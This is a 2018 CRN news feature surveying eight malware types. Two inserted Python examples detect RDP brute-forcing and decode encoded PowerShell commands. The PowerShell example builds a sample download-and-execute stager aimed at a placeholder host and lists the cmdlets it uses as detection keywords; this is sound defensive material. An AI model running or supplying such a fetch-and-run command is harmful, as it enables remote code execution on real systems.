The Eight Most Dangerous Types Of Malware In 2018
Malicious software, better known as malware, is a type of computer program that is designed to run for the benefit of someone other than the owner of the computer. Malware can be used to compromise computer functions, steal data, bypass access controls, or otherwise harm the host.
More specifically, malware is able to cripple or destroy a system’s operation, allowing an attacker access to confidential and sensitive information, as well as the ability to spy on personal or private computers. Bad actors specifically program malware to be stealthy, meaning that it can stay on the target system for a long time without the user consenting or even knowing about it.
Malware can be classified in several different ways, including its delivery method; the specific type of vulnerability being exploited; the goal or objective of the malware; the platform or device targeted by the malware; how the malware attempts to hide itself; and how the malware replicates and spreads.
As part of CRN's Cybersecurity Week 2018, here's a look at eight new and emerging types of malware that are wreaking havoc on users, devices and systems this year.
Some types of malware excel at evading detection techniques by using built-in logic that looks to see whether or not certain kinds of protection capabilities are in place, according to Johnnie Konstantas, senior director, enterprise cybersecurity group at Redmond, Wash.-based Microsoft.
The adaptive malware is usually looking for detection capabilities that are specific to a particular vendor, Konstantas said. If code from that particular vendor is present, Konstantas said the malware either moves on or tries a different method that it knows the vendor isn't capable of spotting.
Bad actors have, in some cases, been able to reverse-engineer a vendor's malware detection process thanks to increased collaboration among hackers as well as the sharing of tools, code and methods, Konstantas said. By obtaining a very deep understanding of how a vendor's protections are supposed to work, Konstantas said the bad actors are therefore able to write code that evades it.
Banking trojans have become a rather common way to go after businesses through either massive spam campaigns or targeted attacks, according to Jerome Segura, lead malware intelligence analyst at Santa Clara, Calif.-based Malwarebytes. These trojans are delivered either via macros or through exploits in the Office document, Segura said, with a loader called Emotet becoming particularly popular.
Banking trojans can provide access to a user's banking credentials, browser credentials or bitcoin wallet, and Segura said that information can be monetized by either selling it on the Dark web or using it to gain access to more valuable parts of the network. Although banking trojans aren't as easy to monetize as ransomware, Segura said they have the benefit of being less visible and noisy.
Some banking trojans are specially configured for particular geographies such as Swiss banks, British banks or Canadian banks, Segura said, and carry out their activity through web injections or man-in-the-middle attacks. After a user logs into a banking application or website, the trojan could inject a different set of authentication questions for the user to answer, thereby capturing their credentials on the fly.
Memory-only malware runs on a user's browser and will keep injecting threads into different Microsoft Edge processes until the user reboots their system, according to Giovanni Vigna, chief technology officer at Redwood City, Calif.-based Lastline. This type of malware is extremely stealthy since it leaves no footprint whatsoever on a user's file system, Vigna said.
Bad actors have been trying to find ways to execute code that won't create an actual file on the system since security tools will likely intercept the system call and scrutinize whatever was written to the file system, Vigna said. There are many tools operating on both Windows and Linux that allow for the execution of malware without actually having to call for the creation of a file system in the OS, he said.
The potential damage from memory-only malware is typically confined to the browser itself, Vigna said, meaning that bad actors can't encrypt files on the system but can steal credentials, inject HTML code, and introduce malicious shell script onto a webpage. If the malware breaks out of browser jail, though, it's then able to do pretty much anything such as encrypting file systems or modifying file settings.
Multi-part malware has both a component to encrypt, destroy or otherwise make the data unavailable, Microsoft's Konstantas said, as well as a component for further propagation. This type of malware is structured so that it downloads in pieces, Konstantas said, meaning that the first piece of malware will communicate out to the command-and-control server as it’s making its way onto the machine.
This communication allows for the retrieval of an additional piece of malware that can be used for screen scraping or crawling file shares, according to Konstantas. In ransomware attacks, Konstantas said the propagation element is focused on destroying or making as much data unavailable as possible to maximize the ransom payout.
In non-ransomware cases, Konstantas said the malware propagates to help find the higher-value parts of the network where the data resides such as HR systems or file systems. Bad actors typically carry this out by making their way into the system directory, elevating a machine's privilege, and then pursuing higher-value targets, according to Konstantas.
It can be difficult to measure the prevalence of ransomware on endpoints in the enterprise, according to Malwarebytes' Segura. Remote Desktop Protocol, or RDP, is a tried and successful vector for delivering ransomware payloads since a lot of companies have weak or poorly secured machines, Segura said.
Bad actors often brute-force attack passwords in order to get onto a machine in the network, Segura said, and from there move laterally to deposit ransomware payloads. SamSam ransomware, for instance, relies on more automated processes to gain a foothold on the network and then uses manual processes for the actual deployment of the ransomware itself, Segura said.
The incidence of ransomware has declined on the consumer side due to a relative paucity of moneymaking opportunities, Segura said. He expects ransomware to become more customized for and targeted at businesses since that's where the opportunity for a larger payout lies.
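The RDP password-guessing vector Segura describes above leaves a characteristic trace: a burst of failed remote-interactive logons from one source, sometimes followed by a success. The following detection logic is an added example (not CRN's, Malwarebytes' or any vendor's code) that runs over constructed Windows Security events flattened into dicts; the field names, the threshold and the window are assumptions.

```python
"""Flag RDP brute-force bursts, and note when one is followed by a successful logon.

Assumed input: Windows Security events (4625 = failed logon, 4624 = successful
logon) flattened to dicts with constructed field names. Logon type 10 is
RemoteInteractive, i.e. RDP, so other logon types are ignored.
"""
from collections import defaultdict

RDP_LOGON_TYPE = 10
FAIL_THRESHOLD = 5     # failed RDP logons from one source that count as a burst (assumed)
WINDOW_SECONDS = 300   # sliding window for the burst (assumed)


def ev(event_id, src_ip, user, time, logon_type=RDP_LOGON_TYPE):
    """Build one flattened event record (constructed sample data)."""
    return {"event_id": event_id, "src_ip": src_ip, "user": user,
            "logon_type": logon_type, "time": time}


# Constructed sample: one source cycles through accounts over RDP and finally
# gets in; a second source fails once and logs in normally; a non-RDP failure
# from the first source must not count.
EVENTS = [
    ev(4625, "203.0.113.7", "administrator", 100),
    ev(4625, "203.0.113.7", "svc_backup", 110, logon_type=3),  # SMB, ignored
    ev(4625, "203.0.113.7", "admin", 130),
    ev(4625, "203.0.113.7", "backup", 160),
    ev(4625, "203.0.113.7", "helpdesk", 190),
    ev(4625, "203.0.113.7", "jdoe", 220),
    ev(4624, "203.0.113.7", "jdoe", 250),      # guessing paid off
    ev(4625, "198.51.100.9", "asmith", 300),   # one typo, then a normal logon
    ev(4624, "198.51.100.9", "asmith", 320),
]


def find_rdp_bruteforce(events, threshold=FAIL_THRESHOLD, window=WINDOW_SECONDS):
    """Return {src_ip: {"failures": n, "success_user": user_or_None}} for bursts."""
    alerts = {}
    failures = defaultdict(list)  # src_ip -> timestamps of recent failed RDP logons
    for e in sorted(events, key=lambda x: x["time"]):
        if e["logon_type"] != RDP_LOGON_TYPE:
            continue
        ip = e["src_ip"]
        # Keep only failures that fall inside the sliding window.
        failures[ip] = [t for t in failures[ip] if e["time"] - t <= window]
        if e["event_id"] == 4625:
            failures[ip].append(e["time"])
            if len(failures[ip]) >= threshold:
                alerts.setdefault(ip, {"failures": 0, "success_user": None})
                alerts[ip]["failures"] = len(failures[ip])
        elif e["event_id"] == 4624 and ip in alerts:
            # A success after a burst is the case to escalate: the foothold
            # Segura describes, from which lateral movement typically follows.
            alerts[ip]["success_user"] = e["user"]
    return alerts
```

In a real deployment the same logic would read 4625/4624 events from the SIEM and the window would be tuned against the environment's normal RDP failure rate.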
Remote Administration Tools
Remote Administration Tools, or RATs, can compromise systems through a back door or by improperly allowing users remote access, according to Malwarebytes' Segura. Many open-source, publicly available RATs can be used for legitimate purposes such as remotely controlling something on the network, Segura said.
But these free tools can be slightly altered and abused by attackers to carry out purely malicious activities such as taking screenshots, recording video or stealing passwords from a remote user, according to Segura. More sophisticated hackers are using RATs in targeted attacks via phishing emails to gain more information about a company for intelligence or espionage purposes, Segura said.
Many RATs can be downloaded off the shelf, Segura said, with security vendors classifying them as riskware or a potentially unwanted tool since they can either be properly used for remote administration or abused altogether. It's important for users to be provided with the option to determine whether or not they want RATs such as keylogging tools running on their system, he said.
Lastline has seen an increase in malware that uses PowerShell or other sophisticated scripting activities on Windows to perform malicious functions, according to Vigna.
PowerShell components can't be analyzed, Vigna said, meaning that it isn't easy to identify that the shell script is doing something bad. As a result, Vigna said PowerShell is able to get around unsophisticated anti-malware tools and achieve persistence and compromise without being too obvious.
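One reason PowerShell-based malware slips past unsophisticated tooling is that the script never touches disk in readable form: it arrives as a Base64-encoded command-line argument. The triage routine below is an added example (not CRN's, Lastline's or any vendor's code) that decodes such command lines from constructed process-creation records and surfaces the keywords a defender would look at; the keyword list and sample command lines are assumptions.

```python
"""Decode PowerShell -EncodedCommand arguments and flag review-worthy keywords.

Assumed input: process command lines as logged by Windows event 4688 or
Sysmon event 1. PowerShell expects the encoded argument to be Base64 of a
UTF-16LE string, which is what decode_encoded_command() reverses.
"""
import base64
import re

# Keywords that warrant analyst review when found in a PowerShell script
# (assumed list; tune per environment). Not proof of malice on their own.
REVIEW_KEYWORDS = re.compile(
    r"(DownloadString|DownloadFile|Invoke-WebRequest|Invoke-Expression|\bIEX\b"
    r"|FromBase64String|-nop\b|-w\s+hidden)", re.I)

ENCODED_FLAG = re.compile(r"(?i)\s-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")


def decode_encoded_command(cmdline):
    """Return the decoded script if cmdline carries an encoded command, else None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed or truncated argument: leave for manual review


def triage(cmdline):
    """Return which script text was examined and the review keywords it contains."""
    decoded = decode_encoded_command(cmdline)
    script = decoded if decoded is not None else cmdline
    hits = sorted({h.lower() for h in REVIEW_KEYWORDS.findall(script)})
    return {"encoded": decoded is not None, "script": script, "hits": hits}


# Constructed samples. The encoded one is built here rather than pasted so the
# example stays self-contained; the URL is a placeholder.
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2')"
ENCODED_SAMPLE = ("powershell.exe -nop -w hidden -enc "
                  + base64.b64encode(_STAGER.encode("utf-16-le")).decode())
BENIGN_SAMPLE = r"powershell.exe -File C:\scripts\nightly-backup.ps1"
```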
Some types of malware burrow themselves deeply into the applications or system-level processes and attempt to inject themselves into the system just as it begins to run, according to Microsoft's Konstantas.
The bulk of the malware detection capabilities in the market today sit above the operating system layer, Konstantas said. But by burrowing itself deeply into the hardware or system-level processes, Konstantas said this type of malware is able to run underneath the operating system and thereby avoid detection.
By coming in at boot-up time right as the machine is firing up, Konstantas said this type of malware is able to sit under all of the applications and protections that only activate after the boot-up is complete. And the longer system-level malware is able to persist, the more time it has to perform actions such as stealing data, destroying data or finding its way to higher-value data, according to Konstantas.